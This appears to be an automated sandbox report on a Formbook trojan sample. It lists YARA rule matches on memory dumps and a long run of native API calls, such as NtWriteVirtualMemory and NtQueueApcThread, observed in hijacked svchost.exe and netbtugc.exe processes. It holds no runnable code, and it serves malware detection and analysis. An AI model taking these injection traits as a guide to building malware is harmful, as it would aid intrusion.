            Source: Yara matchFile source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0269C063 NtClose,1_2_0269C063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B60 NtClose,LdrInitializeThunk,1_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk,1_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074340 NtSetContextThread,1_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074650 NtSuspendThread,1_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B80 NtQueryInformationFile,1_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BA0 NtEnumerateValueKey,1_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BE0 NtQueryValueKey,1_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BF0 NtAllocateVirtualMemory,1_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AB0 NtWaitForSingleObject,1_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AD0 NtReadFile,1_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AF0 NtWriteFile,1_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F30 NtCreateSection,1_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F60 NtCreateProcessEx,1_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F90 NtProtectVirtualMemory,1_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FA0 NtQuerySection,1_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FB0 NtResumeThread,1_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FE0 NtCreateFile,1_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E30 NtWriteVirtualMemory,1_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E80 NtReadVirtualMemory,1_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EA0 NtAdjustPrivilegesToken,1_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EE0 NtQueueApcThread,1_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D00 NtSetInformationFile,1_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D10 NtMapViewOfSection,1_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D30 NtUnmapViewOfSection,1_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DB0 NtEnumerateKey,1_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DD0 NtDelayExecution,1_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C00 NtQueryInformationProcess,1_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C60 NtCreateKey,1_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CA0 NtQueryInformationToken,1_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CC0 NtQueryVirtualMemory,1_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CF0 NtOpenProcess,1_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073010 NtOpenDirectoryObject,1_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073090 NtSetValueKey,1_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030739B0 NtGetContextThread,1_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D10 NtOpenProcessToken,1_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D70 NtOpenThread,1_2_03073D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03614340 NtSetContextThread,LdrInitializeThunk,6_2_03614340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03614650 NtSuspendThread,LdrInitializeThunk,6_2_03614650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612B60 NtClose,LdrInitializeThunk,6_2_03612B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03612BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03612BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03612BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612AF0 NtWriteFile,LdrInitializeThunk,6_2_03612AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612AD0 NtReadFile,LdrInitializeThunk,6_2_03612AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612F30 NtCreateSection,LdrInitializeThunk,6_2_03612F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612FE0 NtCreateFile,LdrInitializeThunk,6_2_03612FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612FB0 NtResumeThread,LdrInitializeThunk,6_2_03612FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03612EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03612E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03612D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03612D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03612DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612DD0 NtDelayExecution,LdrInitializeThunk,6_2_03612DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612C60 NtCreateKey,LdrInitializeThunk,6_2_03612C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03612C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03612CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036135C0 NtCreateMutant,LdrInitializeThunk,6_2_036135C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036139B0 NtGetContextThread,LdrInitializeThunk,6_2_036139B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612B80 NtQueryInformationFile,6_2_03612B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612AB0 NtWaitForSingleObject,6_2_03612AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612F60 NtCreateProcessEx,6_2_03612F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612FA0 NtQuerySection,6_2_03612FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612F90 NtProtectVirtualMemory,6_2_03612F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612E30 NtWriteVirtualMemory,6_2_03612E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612EA0 NtAdjustPrivilegesToken,6_2_03612EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612D00 NtSetInformationFile,6_2_03612D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612DB0 NtEnumerateKey,6_2_03612DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612C00 NtQueryInformationProcess,6_2_03612C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612CF0 NtOpenProcess,6_2_03612CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03612CC0 NtQueryVirtualMemory,6_2_03612CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03613010 NtOpenDirectoryObject,6_2_03613010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03613090 NtSetValueKey,6_2_03613090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03613D70 NtOpenThread,6_2_03613D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03613D10 NtOpenProcessToken,6_2_03613D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B78E60 NtReadFile,6_2_02B78E60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B78F50 NtDeleteFile,6_2_02B78F50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B78CF0 NtCreateFile,6_2_02B78CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B79000 NtClose,6_2_02B79000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B79160 NtAllocateVirtualMemory,6_2_02B79160
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044EB590_2_0044EB59
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_03F716B00_2_03F716B0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_03F74EB80_2_03F74EB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026881131_2_02688113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026722091_2_02672209
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026722101_2_02672210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026862FE1_2_026862FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026862BC1_2_026862BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026863031_2_02686303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0267FBE31_2_0267FBE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0267F9C31_2_0267F9C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0267F9BC1_2_0267F9BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0269E6531_2_0269E653
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0267DC631_2_0267DC63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02672DC01_2_02672DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA3521_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F01_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031003E61_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E02741_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C02C01_2_030C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030301001_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA1181_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C81581_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F41A21_2_030F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031001AA1_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F81CC1_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D20001_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030647501_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030407701_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C01_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C6E01_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030405351_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031005911_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E44201_2_030E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F24461_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EE4F61_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB401_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F6BD71_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA801_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030569621_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A01_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310A9A61_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304A8401_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030428401_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030268B81_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E8F01_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03082F281_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060F301_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E2F301_2_030E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4F401_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BEFA01_2_030BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032FC81_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEE261_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040E591_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052E901_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FCE931_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEEDB1_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304AD001_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DCD1F1_2_030DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03058DBF1_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303ADE01_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040C001_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0CB51_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030CF21_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F132D1_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D34C1_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308739A1_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A01_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C01_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D2F01_2_0305D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307516C1_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F1721_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310B16B1_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304B1B01_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF0CC1_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C01_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F70E91_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF0E01_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF7B01_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030856301_2_03085630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F16CC1_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F75711_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DD5B01_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031095C31_2_031095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF43F1_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030314601_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFB761_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FB801_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B5BF01_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307DBF91_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFA491_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7A461_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B3A6C1_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DDAAC1_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03085AA01_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E1AA31_2_030E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EDAC61_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D59101_2_030D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030499501_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B9501_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD8001_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030438E01_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFF091_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041F921_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFFB11_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03003FD21_2_03003FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03003FD51_2_03003FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03049EB01_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03043D401_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F1D5A1_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7D731_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FDC01_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B9C321_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFCF21_2_030FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369A3526_2_0369A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036A03E66_2_036A03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035EE3F06_2_035EE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036802746_2_03680274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036602C06_2_036602C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036681586_2_03668158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035D01006_2_035D0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0367A1186_2_0367A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036981CC6_2_036981CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036A01AA6_2_036A01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036720006_2_03672000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E07706_2_035E0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036047506_2_03604750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035DC7C06_2_035DC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035FC6E06_2_035FC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E05356_2_035E0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036A05916_2_036A0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036924466_2_03692446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036844206_2_03684420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0368E4F66_2_0368E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369AB406_2_0369AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03696BD76_2_03696BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035DEA806_2_035DEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035F69626_2_035F6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036AA9A66_2_036AA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E29A06_2_035E29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E28406_2_035E2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035EA8406_2_035EA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0360E8F06_2_0360E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035C68B86_2_035C68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03654F406_2_03654F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03622F286_2_03622F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03600F306_2_03600F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03682F306_2_03682F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035D2FC86_2_035D2FC8
